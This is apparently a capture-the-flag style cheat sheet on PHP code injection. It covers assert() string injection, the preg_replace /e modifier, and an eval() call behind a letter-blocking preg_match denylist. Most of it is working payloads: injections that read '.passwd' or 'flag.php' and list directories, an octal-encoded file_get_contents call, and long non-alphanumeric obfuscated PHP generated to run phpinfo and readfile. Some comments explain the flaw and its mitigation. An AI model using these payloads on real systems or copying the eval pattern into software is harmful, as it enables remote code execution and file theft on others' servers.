# The assert() function executes the code passed to it as a string parameter
# (string arguments are deprecated since PHP 7.2 and are no longer evaluated in PHP 8)
# Example using a challenge
?page=..
Warning: assert(): Assertion "strpos('includes/...php', '..') === false" failed in path/index.php on line 8
# The request looks like this
assert("strpos('includes/' . $_GET['page'] . '.php', '..') === false")
# If we inject this
?page=salade.php','..') || print('tomate') || strpos('oignons
# The request will look like
assert("strpos('/includes/salade.php','..') || print('tomate') || strpos('oignons.php','..') ===false")
# Then, to exploit
?page=salade.php','..') || show_source('.passwd') || strpos('oignons
PHP preg_replace()
# In PHP, regular expressions need delimiters
preg_match("recherche","contenu");# wrong
preg_match("/recherche/","contenu");# OK
# preg_replace() with the /e modifier (PREG_REPLACE_EVAL) executes the replacement as PHP code;
# the modifier is deprecated since PHP 5.5 and removed in PHP 7.0 (use preg_replace_callback() instead)
preg_replace("input1search","input2replace","input3content");
preg_replace("/a/e","print(123)","abcd");
preg_replace("/a/e","print_r(scandir('.'))","abcd");
preg_replace("/a/e","file_get_contents('flag.php')","abcd");
PHP preg_match()
# It is possible to bypass some functions like preg_match() by injecting non-alphanumeric characters
# If the application then uses eval() on the user input, the payload will still be executed: the regex is only a denylist, so the eval() on untrusted input is the actual defect to remove
# Application code
# Denylist filter: rejects input containing an ASCII letter or a backtick, but every
# other character (digits, quotes, backslashes, parentheses, $ _ . ;) passes through,
# so this check does not prevent the code injection below.
if(!preg_match('/[a-zA-Z`]/', $_POST['input'])){
print '<fieldset><legend>Result</legend>';
# eval() on untrusted POST data: the filtered input is concatenated straight into PHP
# source, so any letter-free payload (octal escapes, non-alphanumeric PHP) runs with the
# application's privileges. Mitigation: never eval() user input; validate the expected
# value type (e.g. is_numeric()) and print the validated value instead.
eval('print '.$_POST['input'].";");
print '</fieldset>';
}
# Exploitation and Bypass
# You can encode the payload in octal
→ file_get_contents(".passwd")
→ "\146\151\154\145\137\147\145\164\137\143\157\156\164\145\156\164\163"("\056\160\141\163\163\167\144")
# You can also use non-alphanumeric characters (https://github.com/v1ll41n/Und3rCov3r)
echo -n “phpinfo();” > tmp.php
php Und3rCov3r.ph 1 tmp.php
# It will create an alphax.php file containing the encoded payload
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;
$__('$_="'.$___.$______.$___________.$______________.$___.$______.$__________.$______________.$___.$______.$___________.$______________.$___.$______.$__________.$______.$___.$______.$__________.$___________.$___.$______.$_________.$___________.$___.$______.$__________.$____________.$___.$__________.$______________.$___.$__________.$______.$___.$____________.$________.'"');$__($_);
# You can then, for example, read a file
→ readfile(".passwd");
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;
$__('$_="'.$___.$______.$___________.$_______.$___.$______.$_________.$__________.$___.$______.$_________.$______.$___.$______.$_________.$_________.$___.$______.$_________.$___________.$___.$______.$__________.$______.$___.$______.$__________.$_________.$___.$______.$_________.$__________.$___.$__________.$______________.$___.$_________.$_______.$___.$__________.$___________.$___.$______.$___________.$______________.$___.$______.$_________.$______.$___.$______.$___________.$________.$___.$______.$___________.$________.$___.$______.$___________.$____________.$___.$______.$_________.$_________.$___.$_________.$_______.$___.$__________.$______.$___.$____________.$________.'"');$__($_);